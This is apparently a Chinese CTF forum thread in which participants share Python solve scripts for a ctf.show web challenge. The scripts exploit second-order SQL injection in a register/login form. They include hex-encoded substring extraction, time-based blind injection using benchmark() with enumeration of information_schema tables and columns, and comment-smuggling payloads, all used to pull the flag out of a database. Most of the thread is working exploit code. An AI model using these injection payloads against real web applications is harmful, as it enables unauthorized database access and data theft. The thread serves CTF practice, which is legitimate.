>
### id="flarum-content">
web1_签到
y1ngy1ngy1ng
import requests
import re
url = "https://3ff49635-7092-4ee3-9be9-041d0b2d629b.chall.ctf.show"
register = "/register.php"
login = "/login.php"
flag = ""
e = 0
# test{}@66.com
# 0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0
for i in range(1,1000,10):
s = requests.Session()
data = {"e": "", "u": "", "p": "test"}
data["e"] = str(e)+"@aa.com"
e += 1
data["u"] = "0'+(select/**/substr(hex(hex((select/**/*/**/from/**/flag)))/**/from/**/{}/**/for/**/10))+'0".format(i)
s.post(url=url+register,data=data)
del data['u']
s.post(url=url + login, data=data).text
# print(s.post(url=url+login,data=data).text)
text = s.get(url+"/user.php").text
# print(text)
flag += re.search("[0-9]{7,10}", text).group()
print(flag)
# 666C61677B65323935343837662D313362392D343665392D626338632D3530303830336435303234307D
# 转两次16进制得flag{e295487f-13b9-46e9-bc8c-500803d50240}y1ngy1ngy1ng
[网鼎杯2018]Unfinish 差不多的题
admin
对的,题目做为签到练手题,大佬牛皮
cop
借楼交流一下另一种解法
import requests
import time
i=1
n=2
flag=""
for i in range(42,44):
print(i)
m=64
j=64
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
data={"e":"cop\x40qq.com",
"u":exp,
"p":"123456"
}
url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
startTime=time.time()
p=requests.post(url,data=data,timeout=100)
#print(p.status_code)
print(m)
#print(exp)
#print(time.time()-startTime)
if time.time()-startTime<2:
n=1
else:
n=0
if q==7:
if time.time()-startTime<2:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)cop
4.txt2kB
_yu_
import requests
import re
url1 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/register.php"
url2 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/login.php"
flag=''
for i in range(1,50):
payload="hex(hex(substr((select/**/flag/**/from/**/flag)from/**/"+str(i)+"/**/for/**/1))),/*"
#print(payload)
s=requests.session()
data1={
'e':str(i+30)+"',username="+payload,
'u':"*/#",
'p':i+30
}
#print(data1['e'])
r1 = s.post(url1,data=data1)
data2={
'e':i+30,
'p':i+30
}
r2=s.post(url2,data=data2)
t =r2.text
real = re.findall("Hello (.*?),",t)[0]
flag+=real
print(flag)y1ngy1ngy1ng
_yu_ 羽师傅tql
yuchoxuuan
大佬们太强了,我是一位一位出的,把自己蠢哭
def web1():
u='https://07072526-0de4-4111-bc00-b7db08462871.chall.ctf.show/'
ur=u+'register.php'
ul=u+'login.php'
def check(i = 1):
un = 'gues@%d'%i
pl={'e':un,
'u':"0'+(select/**/ord(substr(flag,%d,1))from/**/flag)+'0"%i,
'p':'1'}
hf.post(ur,pl)
txt = hf.post(ul,pl)
co= txt[txt.index('Hello ')+len('Hello '):txt.index(',')]
print(chr(int(co,base=10)),end='')
for r in range(0,48):
check(r+1)y1ngy1ngy1ng
yuchoxuuan 羽师傅的一下就出了 tql
yuchoxuuan
y1ngy1ngy1ng
所以说我把自己蠢哭了啊。。。羽师傅太强了
langzi
yuchoxuuan 正常的select,把查到的数据两次hex,十位十位的存入username,访问login正则出来
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论